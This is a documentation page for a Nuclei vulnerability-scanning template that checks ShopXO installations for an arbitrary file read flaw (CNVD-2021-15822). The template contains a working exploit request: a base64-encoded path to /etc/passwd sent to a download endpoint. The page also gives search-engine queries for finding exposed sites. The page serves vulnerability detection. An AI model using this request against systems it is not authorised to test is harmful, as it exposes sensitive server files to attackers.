ShopXO Download File Read
ID: CNVD-2021-15822
Severity: high
Author: pikpikcu
Tags: cnvd2021,cnvd,shopxo,lfi
Description
Section titled “Description”ShopXO is an open source enterprise-level open source e-commerce system. ShopXO has an arbitrary file reading vulnerability, which can be used by attackers to obtain sensitive information.
YAML Source
Section titled “YAML Source”id: CNVD-2021-15822
info: name: ShopXO Download File Read author: pikpikcu severity: high description: | ShopXO is an open source enterprise-level open source e-commerce system. ShopXO has an arbitrary file reading vulnerability, which can be used by attackers to obtain sensitive information. reference: - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog classification: cpe: cpe:2.3:a:shopxo:shopxo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: shopxo product: shopxo shodan-query: title:"ShopXO企业级B2C电商系统提供商" fofa-query: app="ShopXO企业级B2C电商系统提供商" tags: cnvd2021,cnvd,shopxo,lfi
http: - raw: - | GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a0047304502207f42736c6778f5cd69b45d52424bd99ce88dbb4331ee76be0456413b702b33e5022100f4f3438ef331a143cc1484e8300206296f36e303e6e425f184987b4d46978b4f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cnvd/2021/CNVD-2021-15822.yaml"